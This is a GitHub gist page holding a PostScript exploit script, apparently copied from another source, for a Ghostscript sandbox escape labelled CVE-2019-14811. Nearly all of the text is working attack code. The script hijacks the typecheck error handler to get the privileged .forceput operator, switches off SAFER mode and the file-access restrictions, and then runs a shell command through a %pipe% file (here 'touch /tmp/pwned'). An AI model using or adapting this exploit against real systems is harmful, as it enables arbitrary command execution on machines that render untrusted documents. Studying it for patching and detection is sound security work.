Skip to content

Instantly share code, notes, and snippets.

@rebirthwyw rebirthwyw/
Last active Oct 16, 2019

What would you like to do?
% just copy from
/exploit {
/println { (\\n) exch print print } bind executeonly def
/info { ([*] ) print println } bind executeonly def
/success { ([+] ) print println } bind executeonly def
/fail { ([-] ) print println stop } bind executeonly def
/MaxFileSize 16#10000 def
/readfile {
(r) file
dup MaxFileSize string readstring pop
exch closefile
} bind executeonly def
/osexec {
(%pipe%) exch concatstrings readfile
} bind executeonly def
(= CVE-2019-14811 =)
println println println
(Obtaining .forceput operator from .pdf_hook_DSC_Creator operator...) info
/.forceput null def
systemdict /.pdfdsc get 24 get /.pdf_hook_DSC_Creator exch def
/typecheckcount 0 def
/&typecheck errordict /typecheck get def
errordict /typecheck {
/typecheckcount typecheckcount 1 add def
typecheckcount 2 eq {
1 index 2 get 8 get
/.forceput exch store
} if
} put
null .pdf_hook_DSC_Creator clear
(A candidate for .forceput operator found!) success
(Overwriting several flags to escape from Safer Mode...) info
systemdict /SAFER false .forceput
userparams /LockFilePermissions false .forceput
userparams /PermitFileControl [(*)] .forceput
userparams /PermitFileWriting [(*)] .forceput
userparams /PermitFileReading [(*)] .forceput
save restore
(Could not escape from Safer Mode.) fail
} bind executeonly if
(Successfully escaped from Safer Mode!) success
(Executing a shell command...) info
(touch /tmp/pwned) osexec pop
(PS: I pwned you <3) success
} def
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.